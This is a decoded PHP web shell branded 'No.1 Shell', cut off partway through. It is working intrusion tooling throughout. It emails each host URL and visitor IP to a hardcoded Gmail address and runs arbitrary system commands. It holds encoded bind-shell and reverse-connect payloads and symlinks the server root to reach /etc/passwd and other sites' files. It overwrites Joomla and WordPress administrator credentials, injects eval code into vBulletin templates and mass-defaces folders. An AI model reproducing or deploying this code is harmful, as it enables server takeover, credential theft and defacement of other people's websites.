/* Decoded by unphp.net */ $name = '21232f297a57a5a743894a0e4a801fc3'; $pass = 'b092adad4fbc63777eb59bc8feca962a'; if(!isset($_SERVER['PHP_AUTH_USER']) ||md5($_SERVER['PHP_AUTH_USER']) !== $name ||md5($_SERVER['PHP_AUTH_PW']) !== $pass) { header('WWW-Authenticate: Basic realm="Password"'); header('HTTP/1.0 401 Unauthorized'); exit('Error password'); } $time_shell = "".date("d/m/Y - H:i:s") .""; $ip_remote = $_SERVER["REMOTE_ADDR"]; $from_shellcode = 'shell@'.gethostbyname($_SERVER['SERVER_NAME']) .''; $to_email = 'blog24h@gmail.com'; $server_mail = "".gethostbyname($_SERVER['SERVER_NAME']) ." - ".$_SERVER['HTTP_HOST'] .""; $linkcr = "Link: ".$_SERVER['SERVER_NAME'] ."".$_SERVER['REQUEST_URI'] ." - IP Excuting: $ip_remote - Time: $time_shell"; $header = "From: $from_shellcode Reply-to: $from_shellcode"; @mail($to_email,$server_mail,$linkcr,$header);; set_time_limit(0);error_reporting(0); if(isset($_GET["dl"]) &&($_GET["dl"] != "")){$file = $_GET["dl"];$filez = @file_get_contents($file);header("Content-type: application/octet-stream");header("Content-length: ".strlen($filez));header("Content-disposition: attachment;filename=".basename($file).";");echo $filez;exit;} elseif(isset($_GET["dlgzip"]) &&($_GET["dlgzip"] != "")){$file = $_GET['dlgzip'];$filez = gzencode(@file_get_contents($file));header("Content-Type:application/x-gzip ");header("Content-length: ".strlen($filez));header("Content-disposition: attachment;filename=".basename($file).".gz;");echo $filez;exit;} if(isset($_GET["img"])){@ob_clean();$d = magicboom($_GET["y"]);$f = $_GET["img"];$inf = @getimagesize($d.$f);$ext = explode($f,".");$ext = $ext[count($ext)-1];@header("Content-type: ".$inf["mime"]);@header("Cache-control: public");@header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));@header("Cache-control: max-age=".(60*60*24*7));@readfile($d.$f);exit;}$software = getenv("SERVER_SOFTWARE"); if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") $safemode = TRUE;else $safemode = FALSE;$system = @php_uname();if(strtolower(substr($system,0,3)) == "win") $win = TRUE;else $win = FALSE;if(isset($_GET['y'])){if(@is_dir($_GET['view'])){$pwd = $_GET['view'];@chdir($pwd);}else{$pwd = $_GET['y'];@chdir($pwd);}} if(!$win){if(!$user = rapih(exe("whoami")))$user = "";if(!$id = rapih(exe("id"))) $id = "";$prompt = $user." \$ ";$pwd = @getcwd().DIRECTORY_SEPARATOR;} else {$user = @get_current_user();$id = $user;$prompt = $user." >";$pwd = realpath(".")."\";$v = explode("\",$d);$v = $v[0];foreach (range("A","Z") as $letter) {$bool = @is_dir($letter.":\");if ($bool){$letters .= "[ ";if ($letter.":"!= $v){$letters .= $letter;}else {$letters .= "".$letter."";}$letters .= " ] ";}}} if(function_exists("posix_getpwuid") &&function_exists("posix_getgrgid")) $posix = TRUE; else $posix = FALSE;$server_ip = @gethostbyname($_SERVER["HTTP_HOST"]);$my_ip = $_SERVER['REMOTE_ADDR'];$bindport = "13123";$bindport_pass = "k2ll33d";$pwds = explode(DIRECTORY_SEPARATOR,$pwd);$pwdurl = "";for($i = 0 ;$i ".$pwds[$i]." ".DIRECTORY_SEPARATOR." ";} if(isset($_POST['rename'])){$old = $_POST['oldname'];$new = $_POST['newname'];@rename($pwd.$old,$pwd.$new);$file = $pwd.$new;}if(isset($_POST['chmod'])){ $name = $_POST['name'];$value = $_POST['newvalue'];if (strlen($value)==3){$value = 0 ."".$value;}@chmod($pwd.$name,octdec($value));$file = $pwd.$name;} if(isset($_POST['chmod_folder'])){$name = $_POST['name'];$value = $_POST['newvalue'];if (strlen($value)==3){$value = 0 ."".$value;}@chmod($pwd.$name,octdec($value));$file = $pwd.$name;}$buff = " ".$software."
";$buff .= " ".$system."
";if($id != "") $buff .= " ".$id."
";if($safemode) $buff .= " safemode : ON
";else $buff .= " safemode : OFF
"; function showstat($stat) {if ($stat=="on") {return "ON";}else {return "OFF";}} function testmysql() {if (function_exists('mysql_connect')) {return showstat("on");}else {return showstat("off");}} function testcurl() {if (function_exists('curl_version')) {return showstat("on");}else {return showstat("off");}} function testwget() {if (exe('wget --help')) {return showstat("on");}else {return showstat("off");}} function testperl() {if (exe('perl -h')) {return showstat("on");}else {return showstat("off");}} $buff .= " MySQL: ".testmysql()." | Perl: ".testperl()." | cURL: ".testcurl()." | WGet: ".testwget()."
"; $buff .= " ".$letters." > ".$pwdurl; function rapih($text){return trim(str_replace("
","",$text));} function magicboom($text){if (!get_magic_quotes_gpc()){return $text;}return stripslashes($text);} function showdir($pwd,$prompt){$fname = array();$dname = array(); if(function_exists("posix_getpwuid") &&function_exists("posix_getgrgid")) $posix = TRUE;else $posix = FALSE;$user = "????:????"; if($dh = opendir($pwd)){while($file = readdir($dh)){ if(is_dir($file)){$dname[] = $file;} elseif(is_file($file)){$fname[] = $file;}}closedir($dh);}sort($fname);sort($dname);$path = @explode(DIRECTORY_SEPARATOR,$pwd);$tree = @sizeof($path);$parent = ""; $buff = "
$prompt
view file/folder
"; if($tree >2) for($i=0;$i<$tree-2;$i++) $parent .= $path[$i].DIRECTORY_SEPARATOR; else $parent = $pwd; foreach($dname as $folder){ if($folder == ".") { if(!$win &&$posix){$name=@posix_getpwuid(@fileowner($folder));$group=@posix_getgrgid(@filegroup($folder));$owner = $name['name']." : ".$group['name'];} else {$owner = $user;} $buff .= " ";} elseif($folder == ".."){ if(!$win &&$posix) {$name=@posix_getpwuid(@fileowner($folder));$group=@posix_getgrgid(@filegroup($folder)); $owner = $name['name']." : ".$group['name'];} else {$owner = $user;} $buff .= "";}else{if(!$win &&$posix){ $name=@posix_getpwuid(@fileowner($folder)); $group=@posix_getgrgid(@filegroup($folder)); $owner = $name['name']." : ".$group['name'];} else {$owner = $user;} $buff .= "";}} foreach($fname as $file){ $full = $pwd.$file; if(!$win &&$posix){$name=@posix_getpwuid(@fileowner($file));$group=@posix_getgrgid(@filegroup($file));$owner = $name['name']." : ".$group['name'];} else {$owner = $user;} $buff .= "";} $buff .= "
namesizeowner:grouppermsmodifiedactions
$folder- ".$owner."
".get_perms($pwd)."
 ".date("d-M-Y H:i",@filemtime($pwd))." newfile | newfolder
- ".$owner."
".get_perms($parent)."
 ".date("d-M-Y H:i",@filemtime($parent))." newfile | newfolder
$folder
DIR".$owner."
".get_perms($pwd.$folder)."
".date("d-M-Y H:i",@filemtime($folder))."rename| delete
$file
".ukuran($full)."".$owner."
".get_perms($full)."
".date("d-M-Y H:i",@filemtime($full))." edit | rename| delete | download (gz)
";return $buff;} function ukuran($file){if($size = @filesize($file)){if($size <= 1024) return $size;else{if($size <= 1024*1024) {$size = @round($size / 1024,2);; return "$size kb";}else {$size = @round($size / 1024 / 1024,2);return "$size mb";}}} else return "???";}function exe($cmd){if(function_exists('system')) {@ob_start();@system($cmd);$buff = @ob_get_contents();$buff = @ob_get_contents();@ob_end_clean(); return $buff;}elseif(function_exists('exec')) {@exec($cmd,$results);$buff = "";foreach($results as $result){$buff .= $result;}return $buff;} elseif(function_exists('passthru')){@ob_start();@passthru($cmd);$buff = @ob_get_contents();@ob_end_clean();return $buff;} elseif(function_exists('shell_exec')){$buff = @shell_exec($cmd);return $buff;}}function tulis($file,$text){$textz = gzinflate(base64_decode($text));if($filez = @fopen($file,"w")) {@fputs($filez,$textz);@fclose($file);}} function ambil($link,$file) {if($fp = @fopen($link,"r")){while(!feof($fp)){$cont.= @fread($fp,1024);}@fclose($fp);$fp2 = @fopen($file,"w");@fwrite($fp2,$cont);@fclose($fp2);}} function which($pr){$path = exe("which $pr"); if(!empty($path)) {return trim($path);} else {return trim($pr);}} function download($cmd,$url){$namafile = basename($url); switch($cmd){case 'wwget': exe(which('wget')." ".$url." -O ".$namafile);break;case 'wlynx': exe(which('lynx')." -source ".$url." > ".$namafile);break;case 'wfread': ambil($wurl,$namafile);break;case 'wfetch': exe(which('fetch')." -o ".$namafile." -p ".$url);break;case 'wlinks': exe(which('links')." -source ".$url." > ".$namafile);break;case 'wget': exe(which('GET')." ".$url." > ".$namafile);break;case 'wcurl': exe(which('curl')." ".$url." -o ".$namafile);break;default: break;} return $namafile;}function get_perms($file) {if($mode=@fileperms($file)){$perms='';$perms .= ($mode &00400) ?'r': '-';$perms .= ($mode &00200) ?'w': '-';$perms .= ($mode &00100) ?'x': '-';$perms .= ($mode &00040) ?'r': '-';$perms .= ($mode &00020) ?'w': '-';$perms .= ($mode &00010) ?'x': '-';$perms .= ($mode &00004) ?'r': '-';$perms .= ($mode &00002) ?'w': '-';$perms .= ($mode &00001) ?'x': '-'; return $perms;}else return "??????????";}function clearspace($text){return str_replace(" ","_",$text);}$port_bind_bd_c="bVNhb9owEP2OxH+4phI4NINAN00aYxJaW6maxqbSLxNDKDiXxiLYkW3KGOp/3zlOpo7xIY793jvf +fl8KSQvdinCR2NTofr5p3br8hWmhXw6BQ9mYA8lmjO4UXyD9oSQaAV9AyFPCNRa+pRCWtgmQrJE P/GIhufQg249brd4nmjo9RxBqyNAuwWOdvmyNAKJ+ywlBirhepctruOlW9MJdtzrkjTVKyFB41ZZ dKTIWKb0hoUwmUAcwtFt6+m+EXKVJVtRHGAC07vV/ez2cfwvXSpticytkoYlVglX/fNiuAzDE6VL 3TfVrw4o2P1senPzsJrOfoRjl9cfhWjvIatzRvNvn7+s5o8Pt9OvURzWZV94dQgleag0C3wQVKug Uq2FTFnjDzvxAXphx9cXQfxr6PcthLEo/8a8q8B9LgpkQ7oOgKMbvNeThHMsbSOO69IA0l05YpXk HDT8HxrV0F4LizUWfE+M2SudfgiiYbONxiStebrgyIjfqDJG07AWiAzYBc9LivU3MVpGFV2x1J4W tyxAnivYY8HVFsEqWF+/f7sBk2NRQKcDA/JtsE5MDm9EUG+MhcFqkpX0HmxGbqbkdBTMldaHRsUL ZeoDeOSFBvpefCfXhflOpgTkvJ+jtKiR7vLohYKCqS2ZmMRj4Z5gQZfSiMbi6iqkdnHarEEXYuk6 uPtTdumsr0HC4q5rrzNifV7sC3ZWUmq+LVlVa5OfQjTanZYQO+Uf";$port_bind_bd_pl="ZZJhT8IwEIa/k/AfjklgS2aA+BFmJDB1cW5kHSZGzTK2Qxpmu2wlYoD/bruBIfitd33uvXuvvWr1 NmXRW1DWy7HImo02ebRd19Kq1CIuV3BNtWGzQZeg342DhxcYwcCAHeCWCn1gDOEgi1yHhLYXzfwg tNqKeut/yKJNiUB4skYhg3ZecMETnlmfKKrz4ofFX6h3RZJ3DUmUFaoTszO7jxzPDs0O8SdPEQkD e/xs/gkYsN9DShG0ScwEJAXGAqGufmdq2hKFCnmu1IjvRkpH6hE/Cuw5scfTaWAOVE9pM5WMouM0 LSLK9HM3puMpNhp7r8ZFW54jg5wXx5YZLQUyKXVzwdUXZ+T3imYoV9ds7JqNOElQTjnxPc8kRrVo vaW3c5paS16sjZo6qTEuQKU1UO/RSnFJGaagcFVbjUTCqeOZ2qijNLWzrD8PTe32X9oOgvM0bjGB +hecfOQFlT4UcLSkmI1ceY3VrpKMy9dWUCVCBfTlQX6Owy8=";$back_connect="fZFRS8MwFIXfB/sPWSw2hUrnqyPC0CpD3KStvqh0XRpcsE1KkoKF/XiTtCIV6tu55+Z89yY5W0St ktGB8aihsprPWkVBKsgn1av5zCN1iQGsOv4Fbak6pWmNgU/JUQC4b3lRU3BR7OFqcFhptMOpo28j S2whVulCflCNvXVy//K6fLdWI+SPcekMVpSlxIxTnRdacDSEAnA6gZJRBGMphbwC3uKNw8AhXEKZ ja3ImclYagh61n9JKbTAhu7EobN3Qb4mjW/byr0BSnc3D3EWgqe7fLO1whp5miXx+tHMcNHpGURw Tskvpd92+rxoKEdpdrvZhgBen/exUWf3nE214iT52+r/Cw3/5jaqhKL9iFFpuKPawILVNw==";$back_connect_c="XVHbagIxEH0X/IdhhZLUWF1f1YKIBelFqfZJliUm2W7obiJJLLWl/94k29rWhyEzc+Z2TjpSserA BYyt41JfldftVuc3d7R9q9mLcGeAEk5660sVAakc1FQqFBxqnhkBVlIDl95/3Wa43fpotyCABR95 zzpzYA7CaMq5yaUCK1VAYpup7XaYZpPE1NArIBmBRzgVtVYoJQMcR/jV3vKC1rI6wgSmN/niYb75 i+21cR4pnVYWUaclivcMM/xvRDjhysbHVwde0W+K0wzH9bt3YfRPingClVCnim7a/ZuJC0JTwf3A RkD0fR+B9XJ2m683j/PpPYHFavW43CzzzWyFIfbIAhBiWinBHCo4AXSmFlxiuPB3E0/gXejiHMcY jwcYguIAe2GMNijZ9jL4GYqTSB9AvEmHGjk/m19h1CGvPoHIY5A1Oh2tE3XIe1bxKw77YTyt6T2F 6f9wGEPxJliFkv5Oqr4tE5LYEnoyIfDwdHcXK1ilrfAdUbPPLw==";;echo 'No.1 Shell
  
';echo strtoupper((base64_decode('PGgyIGNsYXNzPSJ0aXRsZSI+Tm8uMSBTaGVsbDwvaDI+ICA=')));;echo '
';echo $buff;;echo 'server ip : ';echo $server_ip."

your ip : ".$my_ip."
";;echo '
H O M E


';if(isset($_GET['x']) &&($_GET['x'] == 'php')){;echo '
';} elseif(isset($_GET['x']) &&($_GET['x'] == 'about')){echo '



No.1 Shell

By No.1


Mail | Facebook | No.1

'.date('Y').'

';} elseif(isset($_GET['x']) &&($_GET['x'] == 'sf')) {@set_time_limit(0);@mkdir('sym',0777);error_reporting(0);$htaccess = "Options all DirectoryIndex gaza.html AddType text/plain .php AddHandler server-parsed .php AddType text/plain .html AddHandler txt .html Require None Satisfy Any";$op =@fopen ('sym/.htaccess','w');fwrite($op ,$htaccess);echo '



Symlinker


File Path:

Symlink Name




';$target = $_POST['file'];$symfile = $_POST['symfile'];$symlink = $_POST['symlink'];if ($symlink) {@symlink("$target","sym/$symfile");echo '
'.$symfile.'



';}} elseif(isset($_GET['x']) &&($_GET['x'] == 'js')) {if ($_POST['symjo']) {$config = file_get_contents($_POST['url']);$user = $_POST['user'];$pass = md5($_POST['pass']);function ex($text,$a,$b){$explode = explode($a,$text);$explode = explode($b,$explode[1]);return $explode[0];}if($config &&ereg('JConfig',$config)){$psswd = ex($config,'$password = \'',"';");$username = ex($config,'$user = \'',"';");$dbname = ex($config,'$db = \'',"';");$prefix = ex($config,'$dbprefix = \'',"';");$host = ex($config,'$host = \'',"';");$email = ex($config,'$mailfrom = \'',"';");$formn = ex($config,'$fromname = \'',"';");$conn = mysql_connect($host,$username,$psswd) or die(mysql_error());mysql_select_db($dbname,$conn) or die($username.' '.$psswd.' '.$host.' '.$dbname);$query = @mysql_query("UPDATE `".$prefix."users` SET `username` ='".$user."' , `password` = '".$pass."', `usertype` = 'Super Administrator', `block` = 0");if ($query) {echo '

Done !


site nameuserpasswordemail
'.$formn.''.$user.''.$_POST["pass"].''.$email.'
';}else {echo '

ERROR !

';}}else die('

Not a joomla config

');}else {;echo '


Joomla login changer ( symlink version )


config link :
new user :
new password :

';}} elseif(isset($_GET['x']) &&($_GET['x'] == 'sec')){$d0mains = @file("/etc/named.conf"); if($d0mains){@mkdir("k2",0777);@chdir("k2");@exe("ln -s / root");$file3 = 'Options all DirectoryIndex Sux.html AddType text/plain .php AddHandler server-parsed .php AddType text/plain .html AddHandler txt .html Require None Satisfy Any';$fp3 = fopen('.htaccess','w');$fw3 = fwrite($fp3,$file3);@fclose($fp3);echo "";$dcount = 1;foreach($d0mains as $d0main){if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#',$d0main,$domains);flush();if(strlen(trim($domains[1][0])) >2){$user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));echo "";flush();$dcount++;}}}echo "
S. No.DomainsUsersSymlink
".$dcount ."".$domains[1][0]."".$user['name']."Symlink
";}else{$TEST=@file('/etc/passwd');if ($TEST){@mkdir("k2",0777);@chdir("k2");exe("ln -s / root");$file3 = 'Options all DirectoryIndex Sux.html AddType text/plain .php AddHandler server-parsed .php AddType text/plain .html AddHandler txt .html Require None Satisfy Any';$fp3 = fopen('.htaccess','w');$fw3 = fwrite($fp3,$file3);@fclose($fp3);echo "

";$dcount = 1;$file = fopen("/etc/passwd","r") or exit("Unable to open file!");while(!feof($file)){$s = fgets($file);$matches = array();$t = preg_match('/\/(.*?)\:\//s',$s,$matches);$matches = str_replace("home/","",$matches[1]);if(strlen($matches) >12 ||strlen($matches) == 0 ||$matches == "bin"||$matches == "etc/X11/fs"||$matches == "var/lib/nfs"||$matches == "var/arpwatch"||$matches == "var/gopher"||$matches == "sbin"||$matches == "var/adm"||$matches == "usr/games"||$matches == "var/ftp"||$matches == "etc/ntp"||$matches == "var/www"||$matches == "var/named")continue;echo "";echo "";$dcount++;}fclose($file);echo "
S. No.UsersSymlink
".$dcount ."".$matches ."Symlink
";}else{if($os != "Windows"){@mkdir("k2",0777);@chdir("k2");@exe("ln -s / root");$file3 = 'Options all DirectoryIndex Sux.html AddType text/plain .php AddHandler server-parsed .php AddType text/plain .html AddHandler txt .html Require None Satisfy Any';$fp3 = fopen('.htaccess','w');$fw3 = fwrite($fp3,$file3);@fclose($fp3);echo "

server symlinker

";$temp = "";$val1 = 0;$val2 = 1000;for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1);if ($uid)$temp .= join(':',$uid)." ";}echo '
';$temp = trim($temp);$file5 = fopen("test.txt","w");fputs($file5,$temp);fclose($file5);$dcount = 1;$file = fopen("test.txt","r") or exit("Unable to open file!");while(!feof($file)){$s = fgets($file);$matches = array();$t = preg_match('/\/(.*?)\:\//s',$s,$matches);$matches = str_replace("home/","",$matches[1]);if(strlen($matches) >12 ||strlen($matches) == 0 ||$matches == "bin"||$matches == "etc/X11/fs"||$matches == "var/lib/nfs"||$matches == "var/arpwatch"||$matches == "var/gopher"||$matches == "sbin"||$matches == "var/adm"||$matches == "usr/games"||$matches == "var/ftp"||$matches == "etc/ntp"||$matches == "var/www"||$matches == "var/named")continue;echo "";echo "";$dcount++;}fclose($file);echo "
idUsersSymlink
".$dcount ."".$matches ."Symlink
";unlink("test.txt");}else echo "
Cannot create Symlink
";}}} elseif(isset($_GET['x']) &&($_GET['x'] == 'mass')){error_reporting(0);;echo '


Folder Mass Defacer


Folder :

File Name :

index URL :

';@error_reporting(0);$mainpath=$_POST[path];$file=$_POST[file];$indexurl=$_POST[url];echo "
";$dir=opendir("$mainpath");while($row=readdir($dir)){$start=@fopen("$row/$file","w+");$code=@file_get_contents($indexurl);$finish=@fwrite($start,$code);if ($finish){echo "» $row/$file » Done

";}}} elseif(isset($_GET['x']) &&($_GET['x'] == 'vb')) {if(empty($_POST['index'])){echo "



Vbulletin index changer


host :  | database :  | username :  | password :  | perfix :


";}else{$localhost = $_POST['localhost'];$database = $_POST['database'];$username = $_POST['username'];$password = $_POST['password'];$perfix = $_POST['perfix'];$index = $_POST['index'];@mysql_connect($localhost,$username,$password) or die(mysql_error());@mysql_select_db($database) or die(mysql_error());$index=str_replace("\'","'",$index);$set_index = "{\${eval(base64_decode(\'";$set_index .= base64_encode("echo '$index';");$set_index .= "\'))}}{\${exit()}}";$ok=@mysql_query("UPDATE ".$perfix."template SET template ='".$set_index."' WHERE title ='FORUMHOME'") or die(mysql_error());if($ok){echo "Defaced

";}}} elseif(isset($_GET['x']) &&($_GET['x'] == 'boom')){error_reporting(0);function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){$ar0=explode($marqueurDebutLien,$text);$ar1=explode($marqueurFinLien,$ar0[$i]);return trim($ar1[0]);}function randomt() {$chars = "abcdefghijkmnopqrstuvwxyz023456789";srand((double)microtime()*1000000);$i = 0;$pass = '';while ($i <= 7) {$num = rand() %33;$tmp = substr($chars,$num,1);$pass = $pass .$tmp;$i++;}return $pass;}function index_changer_wp($conf,$content) {$output = '';$dol = '$';$go = 0;$username = entre2v2($conf,"define('DB_USER', '","');");$password = entre2v2($conf,"define('DB_PASSWORD', '","');");$dbname = entre2v2($conf,"define('DB_NAME', '","');");$prefix = entre2v2($conf,$dol."table_prefix = '","'");$host = entre2v2($conf,"define('DB_HOST', '","');");$link=mysql_connect($host,$username,$password);if($link) {mysql_select_db($dbname,$link) ;$dol = '$';$req1 = mysql_query("UPDATE `".$prefix."users` SET `user_login` = 'admin',`user_pass` = 'b092adad4fbc63777eb59bc8feca962a' WHERE `ID` = 1");}else {$output.= "[-] DB Error
";}if($req1) {$req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='home'");$data = mysql_fetch_array($req);$site_url=$data["option_value"];$req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='template'");$data = mysql_fetch_array($req);$template = $data["option_value"];$req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='current_theme'");$data = mysql_fetch_array($req);$current_theme = $data["option_value"];$useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";$url2=$site_url."/wp-login.php";$ch = curl_init();curl_setopt($ch,CURLOPT_URL,$url2);curl_setopt($ch,CURLOPT_POST,1);curl_setopt($ch,CURLOPT_POSTFIELDS,"log=admin&pwd=123123&rememberme=forever&wp-submit=Log In&testcookie=1");curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_HEADER,0);curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,10);curl_setopt($ch,CURLOPT_USERAGENT,$useragent);curl_setopt($ch,CURLOPT_COOKIEJAR,"COOKIE.txt");curl_setopt($ch,CURLOPT_COOKIEFILE,"COOKIE.txt");$buffer = curl_exec($ch);$pos = strpos($buffer,"action=logout");if($pos === false) {$output.= "[-] Login Error
";}else {$output.= "[+] Login Successful
";$go = 1;}if($go) {$cond = 0;$url2=$site_url."/wp-admin/theme-editor.php?file=/themes/".$template.'/index.php&theme='.urlencode($current_theme).'&dir=theme';curl_setopt($ch,CURLOPT_URL,$url2);curl_setopt($ch,CURLOPT_FOLLOWLOCATION,0);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_HEADER,0);curl_setopt($ch,CURLOPT_USERAGENT,$useragent);curl_setopt($ch,CURLOPT_COOKIEJAR,"COOKIE.txt");curl_setopt($ch,CURLOPT_COOKIEFILE,"COOKIE.txt");$buffer0 = curl_exec($ch);$_wpnonce = entre2v2($buffer0,'');$_file = entre2v2($buffer0,'');if(substr_count($_file,"/index.php") != 0){$output.= "[+] index.php loaded in Theme Editor
";$url2=$site_url."/wp-admin/theme-editor.php";curl_setopt($ch,CURLOPT_URL,$url2);curl_setopt($ch,CURLOPT_POST,1);curl_setopt($ch,CURLOPT_POSTFIELDS,"newcontent=".base64_decode($content)."&action=update&file=".$_file."&_wpnonce=".$_wpnonce."&submit=Update File");curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_HEADER,0);curl_setopt($ch,CURLOPT_USERAGENT,$useragent);curl_setopt($ch,CURLOPT_COOKIEJAR,"COOKIE.txt");curl_setopt($ch,CURLOPT_COOKIEFILE,"COOKIE.txt");$buffer = curl_exec($ch);curl_close($ch);$pos = strpos($buffer,'
');if($pos === false) {$output.= "[-] Updating Index.php Error
";}else {$output.= "[+] Index.php Updated Successfuly
";$hk = explode('public_html',$_file);$output.= '[+] Deface '.file_get_contents($site_url.str_replace('/blog','',$hk[1]));$cond = 1;}}else {$url2=$site_url.'/wp-admin/theme-editor.php?file=index.php&theme='.$template;curl_setopt($ch,CURLOPT_URL,$url2);curl_setopt($ch,CURLOPT_FOLLOWLOCATION,0);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_HEADER,0);curl_setopt($ch,CURLOPT_USERAGENT,$useragent);curl_setopt($ch,CURLOPT_COOKIEJAR,"COOKIE.txt");curl_setopt($ch,CURLOPT_COOKIEFILE,"COOKIE.txt");$buffer0 = curl_exec($ch);$_wpnonce = entre2v2($buffer0,'');$_file = entre2v2($buffer0,'');if(substr_count($_file,"index.php") != 0){$output.= "[+] index.php loaded in Theme Editor
";$url2=$site_url."/wp-admin/theme-editor.php";curl_setopt($ch,CURLOPT_URL,$url2);curl_setopt($ch,CURLOPT_POST,1);curl_setopt($ch,CURLOPT_POSTFIELDS,"newcontent=".base64_decode($content)."&action=update&file=".$_file."&theme=".$template."&_wpnonce=".$_wpnonce."&submit=Update File");curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_HEADER,0);curl_setopt($ch,CURLOPT_USERAGENT,$useragent);curl_setopt($ch,CURLOPT_COOKIEJAR,"COOKIE.txt");curl_setopt($ch,CURLOPT_COOKIEFILE,"COOKIE.txt");$buffer = curl_exec($ch);curl_close($ch);$pos = strpos($buffer,'
');if($pos === false) {$output.= "[-] Updating Index.php Error
";}else {$output.= "[+] Index.php Template Updated Successfuly
";$output.= '[+] Deface '.file_get_contents($site_url.'/wp-content/themes/'.$template.'/index.php');$cond = 1;}}else {$output.= "[-] index.php can not load in Theme Editor
";}}}}else {$output.= "[-] DB Error
";}global $base_path;unlink($base_path.'COOKIE.txt');return array('cond'=>$cond,'output'=>$output);}function index_changer_joomla($conf,$content,$domain) {$doler = '$';$username = entre2v2($conf,$doler."user = '","';");$password = entre2v2($conf,$doler."password = '","';");$dbname = entre2v2($conf,$doler."db = '","';");$prefix = entre2v2($conf,$doler."dbprefix = '","';");$host = entre2v2($conf,$doler."host = '","';");$co=randomt();$site_url = "http://".$domain."/administrator";$output = '';$cond = 0;$link=mysql_connect($host,$username,$password);if($link) {mysql_select_db($dbname,$link) ;$req1 = mysql_query("UPDATE `".$prefix."users` SET `username` ='admin' , `password` = '4297f44b13955235245b2497399d7a93', `usertype` = 'Super Administrator', `block` = 0");$req = mysql_numrows(mysql_query("SHOW TABLES LIKE '".$prefix."extensions'"));}else {$output.= "[-] DB Error
";}if($req1){if ($req) {$req = mysql_query("SELECT * from `".$prefix."template_styles` WHERE `client_id` = '0' and `home` = '1'");$data = mysql_fetch_array($req);$template_name = $data["template"];$req = mysql_query("SELECT * from `".$prefix."extensions` WHERE `name`='".$template_name."' or `element` = '".$template_name."'");$data = mysql_fetch_array($req);$template_id = $data["extension_id"];$url2=$site_url."/index.php";$ch = curl_init();curl_setopt($ch,CURLOPT_URL,$url2);curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_HEADER,0);curl_setopt($ch,CURLOPT_USERAGENT,$useragent);curl_setopt($ch,CURLOPT_COOKIEJAR,$co);curl_setopt($ch,CURLOPT_COOKIEFILE,$co);$buffer = curl_exec($ch);$return = entre2v2($buffer ,'');$cond = 0;if($pos === false) {$output.= "[-] Updating Index.php Error
";}else {$output.= "[+] Index.php Template successfully saved
";$cond = 1;}}}else {$req =mysql_query("SELECT * from `".$prefix."templates_menu` WHERE client_id='0'");$data = mysql_fetch_array($req);$template_name=$data["template"];$useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";$url2=$site_url."/index.php";$ch = curl_init();curl_setopt($ch,CURLOPT_URL,$url2);curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_HEADER,0);curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,10);curl_setopt($ch,CURLOPT_USERAGENT,$useragent);curl_setopt($ch,CURLOPT_COOKIEJAR,$co);curl_setopt($ch,CURLOPT_COOKIEFILE,$co);$buffer = curl_exec($ch);$hidden=entre2v2($buffer ,'');$cond = 0;if($pos === false) {$output.= "[-] Updating Index.php Error
";}else {$output.= "[+] Index.php Template successfully saved
";$cond = 1;}}}}else {$output.= "[-] DB Error
";}global $base_path;unlink($base_path.$co);return array('cond'=>$cond,'output'=>$output);}function exec_mode_1($def_url) {@mkdir('sym',0777);$wr = "Options all DirectoryIndex Sux.html AddType text/plain .php AddHandler server-parsed .php AddType text/plain .html AddHandler txt .html Require None Satisfy Any";$fp = @fopen ('sym/.htaccess','w');fwrite($fp,$wr);@symlink('/','sym/root');$dominios = @file_get_contents("/etc/named.conf");@preg_match_all('/.*?zone "(.*?)" {/',$dominios,$out);$out[1] = array_unique($out[1]);$numero_dominios = count($out[1]);echo "Total domains: $numero_dominios

